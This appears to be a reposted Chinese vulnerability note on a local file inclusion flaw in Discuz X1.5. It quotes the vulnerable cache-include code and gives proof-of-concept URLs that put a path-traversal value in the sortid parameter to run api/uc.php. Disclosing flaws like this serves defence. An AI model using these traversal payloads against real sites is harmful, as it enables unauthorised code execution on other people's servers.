首页 > 网络安全 > 漏洞分析

DISCUZ X1.5 本地文件包含漏洞说明

admin 漏洞分析 2022-02-17 09:47:18 漏洞分析DISCUZ   文件包含"
config_global.php

复制代码代码如下:
  $_config['cache']['type'] = ‘file’;
  function cachedata($cachenames) {
  ……
  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;
  ……
  if($isfilecache) {
  $lostcaches = array();
  foreach($cachenames as $cachename) {
  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
  $lostcaches[] = $cachename;
  }
  }
  ……
  }

  地址:
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
  执行了 api/uc.php 页面代码了。
  作者: Jannock
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/loudongfenxi/149530.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持